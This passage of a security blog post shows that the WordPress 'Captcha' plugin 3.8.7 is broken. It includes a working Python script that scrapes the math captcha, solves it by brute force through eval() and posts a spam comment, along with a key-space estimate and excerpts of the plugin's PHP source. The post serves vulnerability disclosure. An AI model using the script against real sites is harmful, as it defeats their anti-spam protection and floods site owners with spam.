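hashes_per_second = 335_000_000           # hash rate assumed in the text

counts = Counter(seed)                    # how often each character occurs
alphabet = "".join(dict.fromkeys(seed))   # distinct characters, first-seen order

combinations = len(alphabet) ** key_length
seconds = combinations // hashes_per_second
years = seconds / (365.25 * 24 * 3600)

print(alphabet)
print(dict(counts))
print(combinations)
print(seconds, round(years, 1))
```

<p>Note that n^k is an upper bound on the number of distinct keys: characters that occur several times in the seed are drawn more often, so an attacker could try the more likely candidates first.</p>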
<h3>Excursus: Do we even need to crack the function?</h3>
<p>Due to the implementation of the encode() function, it doesn't matter
how good the password is, since at most two bytes of the random
data blob are actually used in the <em>encrypted</em> value. Just analyze the
encode() function and you will soon realize that every number 0-9 is
xored with one random byte and every number from 10 upwards is xored with two random
bytes... So there is just no need for more than two random bytes :/</p>
<h2>Original blog post</h2>
<h3>Preface (Start of blog post that applies to version 3.8.7)</h3>
<p>Over the years I have seen quite a few applications that weren't very
well engineered: security bugs, cumbersome coding practices and a
missing sense for software architecture, to name a few key points. But
there was usually some reason for the lack of quality, be it the
inexperience of the authors, the relative novelty of the application or
just laziness. Bad code is not really <em>that bad</em> if it doesn't
compromise the security or usability of the software and does not
jeopardize many users. But apps that compromise both and are
at the same time in an advanced development stage are really unpleasant to
encounter. (That's my opinion. I think there are also many examples of
my own code that lack security, usability and good coding practices. But
I didn't publish any of that code officially or even distribute it
commercially.)</p>
<p>In this blog post I will demonstrate the utter failure of a thousand
line wordpress security plugin that is supposed to tell computers and
humans apart (CAPTCHA).</p>
<h3>Who is the villain?</h3>
<p><strong>It is <a href="http://wordpress.org/plugins/captcha/">Captcha</a>.</strong></p>
<p>Some basic information about the wordpress plugin (From 03.11.2013):</p>
<table class="table">
<thead>
<tr>
<th>
Affected version
</th>
<th>
Vendor
</th>
<th>
Last Updated
</th>
<th>
Downloads
</th>
<th>
Ratings
</th>
<th>
Downloads yesterday
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<a href="http://plugins.svn.wordpress.org/captcha/tags/3.8.7/" title="3.8.7">3.8.7</a>
</td>
<td>
http://bestwebsoft.com/
</td>
<td>
2013-10-31
</td>
<td>
1,187,259
</td>
<td>
4.6 of 5 stars (240 ratings)
</td>
<td>
4,215
</td>
</tr>
</tbody>
</table>
<p>Therefore this plugin is <strong>rather large</strong> and enjoys an ever-growing user
base. It is also the very first hit when you type "Captcha" in the
wordpress search form. Maybe because the plugin has exactly the same
name :/ Anyways, the prominent position is reason enough to investigate
further.</p>
<p>Its description states euphorically:</p>
<blockquote>
<p>The Captcha plugin allows you to implement a super security captcha
form into web forms. It protects your website from spam by means of
math logic, easily understood by human beings. You will not have to
spend your precious time on annoying attempts to understand
hard-to-read words, combinations of letters or pictures that make your
eyes pop up. All you need is to do one of the three basic maths
actions - add, subtract and multiply. This captcha can be used for
login, registration, password recovery, comments forms.</p>
</blockquote>
<p>That reads very well. Handy math equations, sophisticated protection
from spammers, super security (<a href="http://kryptochef.net/">Cryptochef</a> is
calling)! No need for hard-to-decipher captchas! Blame me, but I don't
believe it...</p>
<h3>The blackbox approach (Without reading the source)</h3>
<p>How can easy math equations like these</p>
<p><img alt="captcha 1" src="http://s.wordpress.org/plugins/captcha/screenshot-3.jpg?r=798318"><br>
<img alt="captcha 2" src="http://s.wordpress.org/plugins/captcha/screenshot-4.jpg?r=798318"><br>
<img alt="captcha 3" src="http://s.wordpress.org/plugins/captcha/screenshot-5.jpg?r=798318"></p>
<p>be immune against common parsing and computational evaluation?</p>
<p>Let's see whether we can actually crack them using a little quick &amp; dirty
python script I just coded without even reading the source code further.
You can also find the script on my <a href="https://github.com/NikolaiT/Scripts/blob/master/scripts/python/cracking_captcha_plugin/crack.py" title="github account">github
account</a>.
Please note that you have to install the captcha plugin on your
wordpress site and that you need to adjust the links in the script to
point to an existing blog site in order to test that the script solves
the captchas.</p>
<div class="highlight"><pre><span></span><code><span class="c1"># Proves the uselessness of a popular captcha plugin for wordpress</span>
<span class="c1"># Software link: http://wordpress.org/plugins/captcha/</span>
<span class="c1"># Modify the links to test on your site. You should obviously provide correct URIs</span>
<span class="c1"># and have the plugin installed.</span>
<span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">lxml.html</span>
<span class="kn">import</span> <span class="nn">itertools</span>
<span class="n">N</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'zero'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span><span class="s1">'one'</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span><span class="s1">'two'</span><span class="p">:</span> <span class="mi">2</span><span class="p">,</span><span class="s1">'three'</span><span class="p">:</span> <span class="mi">3</span><span class="p">,</span><span class="s1">'four'</span><span class="p">:</span> <span class="mi">4</span><span class="p">,</span><span class="s1">'five'</span><span class="p">:</span> <span class="mi">5</span><span class="p">,</span><span class="s1">'six'</span><span class="p">:</span> <span class="mi">6</span><span class="p">,</span><span class="s1">'seven'</span><span class="p">:</span> <span class="mi">7</span><span class="p">,</span><span class="s1">'eight'</span><span class="p">:</span> <span class="mi">8</span><span class="p">,</span><span class="s1">'nine'</span><span class="p">:</span> <span class="mi">9</span><span class="p">,</span><span class="s1">'eleven'</span><span class="p">:</span> <span class="mi">11</span><span class="p">,</span><span class="s1">'twelve'</span><span class="p">:</span> <span class="mi">12</span><span class="p">,</span><span class="s1">'thirteen'</span><span class="p">:</span> <span class="mi">13</span><span class="p">,</span>
<span class="s1">'fourteen'</span><span class="p">:</span> <span class="mi">14</span><span class="p">,</span><span class="s1">'fifteen'</span><span class="p">:</span> <span class="mi">15</span><span class="p">,</span><span class="s1">'sixteen'</span><span class="p">:</span> <span class="mi">16</span><span class="p">,</span><span class="s1">'seventeen'</span><span class="p">:</span> <span class="mi">17</span><span class="p">,</span><span class="s1">'eighteen'</span><span class="p">:</span> <span class="mi">18</span><span class="p">,</span><span class="s1">'nineteen'</span><span class="p">:</span> <span class="mi">19</span><span class="p">,</span> <span class="s1">'ten'</span><span class="p">:</span> <span class="mi">10</span><span class="p">,</span><span class="s1">'twenty'</span><span class="p">:</span> <span class="mi">20</span><span class="p">,</span><span class="s1">'thirty'</span><span class="p">:</span> <span class="mi">30</span><span class="p">,</span>
<span class="s1">'forty'</span><span class="p">:</span> <span class="mi">40</span><span class="p">,</span><span class="s1">'fifty'</span><span class="p">:</span> <span class="mi">50</span><span class="p">,</span><span class="s1">'sixty'</span><span class="p">:</span> <span class="mi">60</span><span class="p">,</span><span class="s1">'seventy'</span><span class="p">:</span> <span class="mi">70</span><span class="p">,</span><span class="s1">'eighty'</span><span class="p">:</span> <span class="mi">80</span><span class="p">,</span><span class="s1">'ninety'</span><span class="p">:</span><span class="mi">90</span><span class="p">}</span>
<span class="n">OPERATORS</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'+'</span><span class="p">:</span> <span class="s1">'+'</span><span class="p">,</span> <span class="s1">'−'</span><span class="p">:</span> <span class="s1">'-'</span><span class="p">,</span> <span class="s1">'×'</span><span class="p">:</span> <span class="s1">'*'</span><span class="p">,</span> <span class="s1">'/'</span><span class="p">:</span> <span class="s1">'/'</span><span class="p">,</span> <span class="s1">'='</span><span class="p">:</span> <span class="s1">'='</span><span class="p">}</span>
<span class="k">def</span> <span class="nf">R</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">d</span><span class="p">):</span>
<span class="k">for</span> <span class="n">key</span><span class="p">,</span> <span class="n">value</span> <span class="ow">in</span> <span class="n">d</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">value</span><span class="p">))</span>
<span class="c1"># If we can make a sum of the string, try it (For cases like "twenty four")</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">has_op</span><span class="p">(</span><span class="n">s</span><span class="p">)</span> <span class="ow">and</span> <span class="s1">'y'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">s</span><span class="p">:</span>
<span class="n">s</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="nb">sum</span><span class="p">([</span><span class="nb">int</span><span class="p">(</span><span class="n">n</span><span class="p">)</span> <span class="k">for</span> <span class="n">n</span> <span class="ow">in</span> <span class="n">s</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">' '</span><span class="p">)</span> <span class="k">if</span> <span class="n">n</span> <span class="ow">and</span> <span class="nb">int</span><span class="p">(</span><span class="n">n</span><span class="p">)</span> <span class="ow">in</span> <span class="n">N</span><span class="o">.</span><span class="n">values</span><span class="p">()]))</span>
<span class="k">return</span> <span class="n">s</span>
<span class="c1"># Prevent bad words in eval() </span>
<span class="k">def</span> <span class="nf">whitelist</span><span class="p">(</span><span class="n">captcha</span><span class="p">):</span>
<span class="n">good</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="n">itertools</span><span class="o">.</span><span class="n">chain</span><span class="p">(</span><span class="n">N</span><span class="o">.</span><span class="n">keys</span><span class="p">(),</span> <span class="p">[</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">N</span><span class="o">.</span><span class="n">values</span><span class="p">()],</span> <span class="n">OPERATORS</span><span class="o">.</span><span class="n">keys</span><span class="p">()))</span>
<span class="k">for</span> <span class="n">token</span> <span class="ow">in</span> <span class="n">captcha</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">' '</span><span class="p">):</span>
<span class="n">token</span> <span class="o">=</span> <span class="n">token</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
<span class="k">if</span> <span class="n">token</span> <span class="ow">and</span> <span class="n">token</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">good</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"I failed: [</span><span class="si">%s</span><span class="s2">]"</span> <span class="o">%</span> <span class="n">token</span><span class="p">)</span>
<span class="n">exit</span><span class="p">(</span><span class="s1">'Better not.'</span><span class="p">)</span>
<span class="k">return</span> <span class="n">captcha</span>
<span class="k">def</span> <span class="nf">has_op</span><span class="p">(</span><span class="n">expr</span><span class="p">):</span>
<span class="k">for</span> <span class="n">o</span> <span class="ow">in</span> <span class="n">OPERATORS</span><span class="o">.</span><span class="n">keys</span><span class="p">():</span>
<span class="k">if</span> <span class="n">o</span> <span class="ow">in</span> <span class="n">expr</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">def</span> <span class="nf">get_op</span><span class="p">(</span><span class="n">expr</span><span class="p">):</span>
<span class="k">for</span> <span class="n">o</span> <span class="ow">in</span> <span class="n">OPERATORS</span><span class="o">.</span><span class="n">keys</span><span class="p">():</span>
<span class="k">if</span> <span class="n">o</span> <span class="ow">in</span> <span class="n">expr</span><span class="p">:</span>
<span class="k">return</span> <span class="n">o</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">def</span> <span class="nf">solve</span><span class="p">(</span><span class="n">captcha</span><span class="p">):</span>
<span class="c1"># Some example captchas:</span>
<span class="c1"># '9 − = eight'</span>
<span class="c1"># '+ 3 = eight'</span>
<span class="c1"># '9 × one ='</span>
<span class="c1"># '× 8 = twenty four'</span>
<span class="c1"># We see: Simple mathematical expression consisting of two parts. Let's parse that.</span>
<span class="n">left</span><span class="p">,</span> <span class="n">equals</span><span class="p">,</span> <span class="n">right</span> <span class="o">=</span> <span class="n">captcha</span><span class="o">.</span><span class="n">partition</span><span class="p">(</span><span class="s1">'='</span><span class="p">)</span> <span class="c1"># Python is beautiful</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">left</span><span class="o">.</span><span class="n">strip</span><span class="p">():</span>
<span class="n">left</span> <span class="o">=</span> <span class="s1">'y'</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">right</span><span class="o">.</span><span class="n">strip</span><span class="p">():</span>
<span class="n">right</span> <span class="o">=</span> <span class="s1">'y'</span>
<span class="n">left</span> <span class="o">=</span><span class="n">R</span><span class="p">(</span><span class="n">left</span><span class="p">,</span> <span class="n">N</span><span class="p">)</span>
<span class="n">right</span> <span class="o">=</span> <span class="n">R</span><span class="p">(</span><span class="n">right</span><span class="p">,</span> <span class="n">N</span><span class="p">)</span>
<span class="n">expr</span> <span class="o">=</span> <span class="p">[</span><span class="n">left</span><span class="p">,</span> <span class="n">right</span><span class="p">][</span><span class="n">has_op</span><span class="p">(</span><span class="n">right</span><span class="p">)]</span> <span class="c1"># expr is the part with the mathematical operator</span>
<span class="n">ll</span><span class="p">,</span> <span class="n">op</span><span class="p">,</span> <span class="n">rr</span> <span class="o">=</span> <span class="n">expr</span><span class="o">.</span><span class="n">partition</span><span class="p">(</span><span class="n">get_op</span><span class="p">(</span><span class="n">expr</span><span class="p">))</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">ll</span><span class="o">.</span><span class="n">strip</span><span class="p">():</span>
<span class="n">ll</span> <span class="o">=</span> <span class="s1">'y'</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">rr</span><span class="o">.</span><span class="n">strip</span><span class="p">():</span>
<span class="n">rr</span> <span class="o">=</span> <span class="s1">'y'</span>
<span class="c1"># Reassemble</span>
<span class="n">X</span> <span class="o">=</span> <span class="s1">'</span><span class="si">%s</span><span class="s1"> == </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="p">(</span><span class="s1">'</span><span class="si">%s</span><span class="s1"> </span><span class="si">%s</span><span class="s1"> </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="p">(</span><span class="n">R</span><span class="p">(</span><span class="n">ll</span><span class="p">,</span> <span class="n">N</span><span class="p">),</span> <span class="n">OPERATORS</span><span class="p">[</span><span class="n">op</span><span class="p">],</span> <span class="n">R</span><span class="p">(</span><span class="n">rr</span><span class="p">,</span> <span class="n">N</span><span class="p">)),</span> <span class="p">[</span><span class="n">right</span><span class="p">,</span> <span class="n">left</span><span class="p">][</span><span class="n">expr</span><span class="o">==</span><span class="n">right</span><span class="p">])</span>
<span class="c1"># Brute force</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">10000</span><span class="p">):</span>
<span class="k">if</span> <span class="nb">eval</span><span class="p">(</span><span class="n">X</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">'y'</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">))):</span>
<span class="k">return</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="c1"># Obtain post parameters from comment form</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'http://incolumitas.com/2013/10/16/create-your-own-font-the-hard-way/'</span><span class="p">)</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">ConnectionError</span> <span class="k">as</span> <span class="n">cerr</span><span class="p">:</span>
<span class="n">exit</span><span class="p">(</span><span class="s1">'Network problem occurred'</span><span class="p">)</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">Timeout</span> <span class="k">as</span> <span class="n">terr</span><span class="p">:</span>
<span class="n">exit</span><span class="p">(</span><span class="s1">'Connection timeout'</span><span class="p">)</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">r</span><span class="o">.</span><span class="n">ok</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'HTTP Error:'</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">status_code</span><span class="p">)</span>
<span class="c1"># Parse parameters and solve captcha</span>
<span class="n">dom</span> <span class="o">=</span> <span class="n">lxml</span><span class="o">.</span><span class="n">html</span><span class="o">.</span><span class="n">fromstring</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s1">'utf-8'</span><span class="p">))</span>
<span class="n">el</span> <span class="o">=</span> <span class="n">dom</span><span class="o">.</span><span class="n">find_class</span><span class="p">(</span><span class="s1">'cptch_block'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
<span class="n">captcha</span> <span class="o">=</span> <span class="n">el</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
<span class="n">solution</span> <span class="o">=</span> <span class="n">solve</span><span class="p">(</span><span class="n">whitelist</span><span class="p">(</span><span class="n">captcha</span><span class="p">))</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">el</span><span class="o">.</span><span class="n">getchildren</span><span class="p">():</span>
<span class="k">try</span><span class="p">:</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'cptch_result'</span><span class="p">:</span>
<span class="n">result</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'cptch_time'</span><span class="p">:</span>
<span class="n">time</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">except</span> <span class="ne">KeyError</span><span class="p">:</span>
<span class="k">pass</span>
<span class="n">el</span><span class="o">=</span> <span class="n">dom</span><span class="o">.</span><span class="n">find_class</span><span class="p">(</span><span class="s1">'form-submit'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">el</span><span class="o">.</span><span class="n">getchildren</span><span class="p">():</span>
<span class="k">try</span><span class="p">:</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'comment_post_ID'</span><span class="p">:</span>
<span class="n">post_id</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'comment_parent'</span><span class="p">:</span>
<span class="n">comment_parent</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">except</span> <span class="ne">KeyError</span><span class="p">:</span>
<span class="k">pass</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"[+] Solution of captcha '</span><span class="si">%s</span><span class="s2">' is </span><span class="si">%s</span><span class="s2">"</span> <span class="o">%</span> <span class="p">(</span><span class="n">captcha</span><span class="p">,</span> <span class="n">solution</span><span class="p">))</span>
<span class="c1"># Now write a comment with the cracked captcha to prove that we provided the</span>
<span class="c1"># correct solution.</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'author'</span><span class="p">:</span> <span class="s1">'spammer'</span><span class="p">,</span> <span class="s1">'email'</span><span class="p">:</span> <span class="s1">'spammer@spamhouse.org'</span><span class="p">,</span> <span class="s1">'url'</span><span class="p">:</span> <span class="s1">'http://spamming.com'</span><span class="p">,</span>
<span class="s1">'cptch_result'</span><span class="p">:</span> <span class="n">result</span><span class="p">,</span> <span class="s1">'cptch_time'</span><span class="p">:</span> <span class="n">time</span><span class="p">,</span> <span class="s1">'cptch_number'</span><span class="p">:</span> <span class="n">solution</span><span class="p">,</span>
<span class="s1">'comment'</span><span class="p">:</span> <span class="s2">"Hi there! No protection from spammers!!!:D"</span><span class="p">,</span> <span class="s1">'submit'</span><span class="p">:</span> <span class="s1">'Post+Comment'</span><span class="p">,</span>
<span class="s1">'comment_post_ID'</span><span class="p">:</span> <span class="n">post_id</span><span class="p">,</span> <span class="s1">'comment_parent'</span><span class="p">:</span> <span class="n">comment_parent</span><span class="p">}</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="s2">"http://incolumitas.com/wp-comments-post.php"</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">payload</span><span class="p">)</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">ConnectionError</span> <span class="k">as</span> <span class="n">cerr</span><span class="p">:</span>
<span class="n">exit</span><span class="p">(</span><span class="s1">'Network problem occurred'</span><span class="p">)</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">Timeout</span> <span class="k">as</span> <span class="n">terr</span><span class="p">:</span>
<span class="n">exit</span><span class="p">(</span><span class="s1">'Connection timeout'</span><span class="p">)</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">r</span><span class="o">.</span><span class="n">ok</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'HTTP Error:'</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">status_code</span><span class="p">)</span>
<span class="k">if</span> <span class="s1">'''Error: You have entered an incorrect CAPTCHA value.'''</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[-] Captcha cracking was not successful'</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[+] Comment submitted'</span><span class="p">)</span>
</code></pre></div>
<p>That works surprisingly well. Without my even reading its code, the
captcha plugin is completely broken by the approach above. The code
simply parses the mathematical equation (the plugin always serves
equations) and assembles it into a string that is fed to Python's built-in
eval(). We then iterate from 0 to 9999 and substitute the loop variable
for the missing number in the expression. If the expression evaluates
to true, we have found the missing number and therefore the solution. Really
easy. Well, the plugin is broken, that's proven, but I have this strange
feeling that I might be on track to reveal a twofold broken app :P
(It's 04:00 in the morning here, maybe that's why I am writing so
cockily)</p>
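<p>The brute-force idea does not actually need eval(). Here is a minimal
sketch of the same search using the operator module instead. The function
name <code>brute_force</code> and its argument layout are my own
assumptions for illustration, they are not part of the script above:</p>

```python
import operator

# The three operator glyphs the plugin prints, mapped to Python functions.
OPS = {'+': operator.add, '−': operator.sub, '×': operator.mul}

def brute_force(left, op, right, result, limit=10000):
    """Find the missing number in 'left op right = result'.

    Exactly one of left, right and result is None (the blank field).
    Returns the first non-negative integer below `limit` that makes
    the equation true, or None if there is no such number.
    """
    for y in range(limit):
        a = y if left is None else left
        b = y if right is None else right
        c = y if result is None else result
        if OPS[op](a, b) == c:
            return y
    return None

# The example captchas from the comments in solve():
print(brute_force(9, '−', None, 8))     # '9 − = eight'
print(brute_force(None, '×', 8, 24))    # '× 8 = twenty four'
```

<p>Since no string is ever evaluated, the whitelist step becomes
unnecessary in this variant.</p>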
<h3>Whiteboxing - Code assessment</h3>
<p>Let's review the source code of the plugin.</p>
<p>Want to have a glance at the code yourself?
<a href="http://plugins.svn.wordpress.org/captcha/tags/3.8.7/captcha.php" title="the code">Here</a>
you go.<br>
My very first impression was quite positive (apart from already knowing
that the plugin was useless :/). The author seems to possess a profound
understanding of the WordPress API: he uses lots of hooks (filters and
actions) and, at first glance, structures the code very nicely. I
know from my own experience that writing code for WordPress is not always
easy. But let's look at the critical part. The captcha is generated by
the function cptch_display_captcha_custom(). For your convenience, I
will list it here:</p>
<div class="highlight"><pre><span></span><code><span class="x">// Functionality of the captcha logic work for custom form</span>
<span class="x">if ( ! function_exists( 'cptch_display_captcha_custom' ) ) {</span>
<span class="x"> function cptch_display_captcha_custom() {</span>
<span class="x"> global $cptch_options, $str_key, $cptch_time;</span>
<span class="x"> $content = "";</span>
<span class="x"> // In letters presentation of numbers 0-9</span>
<span class="x"> $number_string = array(); </span>
<span class="x"> $number_string[0] = __( 'zero', 'captcha' );</span>
<span class="x"> $number_string[1] = __( 'one', 'captcha' );</span>
<span class="x"> $number_string[2] = __( 'two', 'captcha' );</span>
<span class="x"> $number_string[3] = __( 'three', 'captcha' );</span>
<span class="x"> $number_string[4] = __( 'four', 'captcha' );</span>
<span class="x"> $number_string[5] = __( 'five', 'captcha' );</span>
<span class="x"> $number_string[6] = __( 'six', 'captcha' );</span>
<span class="x"> $number_string[7] = __( 'seven', 'captcha' );</span>
<span class="x"> $number_string[8] = __( 'eight', 'captcha' );</span>
<span class="x"> $number_string[9] = __( 'nine', 'captcha' ); </span>
<span class="x"> // In letters presentation of numbers 11 -19</span>
<span class="x"> $number_two_string = array();</span>
<span class="x"> $number_two_string[1] = __( 'eleven', 'captcha' );</span>
<span class="x"> $number_two_string[2] = __( 'twelve', 'captcha' );</span>
<span class="x"> $number_two_string[3] = __( 'thirteen', 'captcha' );</span>
<span class="x"> $number_two_string[4] = __( 'fourteen', 'captcha' );</span>
<span class="x"> $number_two_string[5] = __( 'fifteen', 'captcha' );</span>
<span class="x"> $number_two_string[6] = __( 'sixteen', 'captcha' );</span>
<span class="x"> $number_two_string[7] = __( 'seventeen', 'captcha' );</span>
<span class="x"> $number_two_string[8] = __( 'eighteen', 'captcha' );</span>
<span class="x"> $number_two_string[9] = __( 'nineteen', 'captcha' );</span>
<span class="x"> // In letters presentation of numbers 10, 20, 30, 40, 50, 60, 70, 80, 90</span>
<span class="x"> $number_three_string = array();</span>
<span class="x"> $number_three_string[1] = __( 'ten', 'captcha' );</span>
<span class="x"> $number_three_string[2] = __( 'twenty', 'captcha' );</span>
<span class="x"> $number_three_string[3] = __( 'thirty', 'captcha' );</span>
<span class="x"> $number_three_string[4] = __( 'forty', 'captcha' );</span>
<span class="x"> $number_three_string[5] = __( 'fifty', 'captcha' );</span>
<span class="x"> $number_three_string[6] = __( 'sixty', 'captcha' );</span>
<span class="x"> $number_three_string[7] = __( 'seventy', 'captcha' );</span>
<span class="x"> $number_three_string[8] = __( 'eighty', 'captcha' );</span>
<span class="x"> $number_three_string[9] = __( 'ninety', 'captcha' );</span>
<span class="x"> // The array of math actions</span>
<span class="x"> $math_actions = array();</span>
<span class="x"> // If value for Plus on the settings page is set</span>
<span class="x"> if( 1 == $cptch_options['cptch_math_action_plus'] )</span>
<span class="x"> $math_actions[] = '+';</span>
<span class="x"> // If value for Minus on the settings page is set</span>
<span class="x"> if( 1 == $cptch_options['cptch_math_action_minus'] )</span>
<span class="x"> $math_actions[] = '−';</span>
<span class="x"> // If value for Increase on the settings page is set</span>
<span class="x"> if( 1 == $cptch_options['cptch_math_action_increase'] )</span>
<span class="x"> $math_actions[] = '×';</span>
<span class="x"> // Which field from three will be the input to enter required value</span>
<span class="x"> $rand_input = rand( 0, 2 );</span>
<span class="x"> // Which field from three will be the letters presentation of numbers</span>
<span class="x"> $rand_number_string = rand( 0, 2 );</span>
<span class="x"> // If don't check Word in setting page - $rand_number_string not display</span>
<span class="x"> if( 0 == $cptch_options["cptch_difficulty_word"])</span>
<span class="x"> $rand_number_string = -1;</span>
<span class="x"> // Set value for $rand_number_string while $rand_input = $rand_number_string</span>
<span class="x"> while($rand_input == $rand_number_string) {</span>
<span class="x"> $rand_number_string = rand( 0, 2 );</span>
<span class="x"> }</span>
<span class="x"> // What is math action to display in the form</span>
<span class="x"> $rand_math_action = rand( 0, count($math_actions) - 1 );</span>
<span class="x"> $array_math_expretion = array();</span>
<span class="x"> // Add first part of mathematical expression</span>
<span class="x"> $array_math_expretion[0] = rand( 1, 9 );</span>
<span class="x"> // Add second part of mathematical expression</span>
<span class="x"> $array_math_expretion[1] = rand( 1, 9 );</span>
<span class="x"> // Calculation of the mathematical expression result</span>
<span class="x"> switch( $math_actions[$rand_math_action] ) {</span>
<span class="x"> case "+":</span>
<span class="x"> $array_math_expretion[2] = $array_math_expretion[0] + $array_math_expretion[1];</span>
<span class="x"> break;</span>
<span class="x"> case "−":</span>
<span class="x"> // Result must not be equal to the negative number</span>
<span class="x"> if($array_math_expretion[0] < $array_math_expretion[1]) {</span>
<span class="x"> $number = $array_math_expretion[0];</span>
<span class="x"> $array_math_expretion[0] = $array_math_expretion[1];</span>
<span class="x"> $array_math_expretion[1] = $number;</span>
<span class="x"> }</span>
<span class="x"> $array_math_expretion[2] = $array_math_expretion[0] - $array_math_expretion[1];</span>
<span class="x"> break;</span>
<span class="x"> case "×":</span>
<span class="x"> $array_math_expretion[2] = $array_math_expretion[0] * $array_math_expretion[1];</span>
<span class="x"> break;</span>
<span class="x"> }</span>
<span class="x"> // String for display</span>
<span class="x"> $str_math_expretion = "";</span>
<span class="x"> // First part of mathematical expression</span>
<span class="x"> if( 0 == $rand_input )</span>
<span class="x"> $str_math_expretion .= "";</span>
<span class="x"> else if ( 0 == $rand_number_string || 0 == $cptch_options["cptch_difficulty_number"] )</span>
<span class="x"> $str_math_expretion .= $number_string[$array_math_expretion[0]];</span>
<span class="x"> else</span>
<span class="x"> $str_math_expretion .= $array_math_expretion[0];</span>
<span class="x"> // Add math action</span>
<span class="x"> $str_math_expretion .= " ".$math_actions[$rand_math_action];</span>
<span class="x"> // Second part of mathematical expression</span>
<span class="x"> if( 1 == $rand_input )</span>
<span class="x"> $str_math_expretion .= " ";</span>
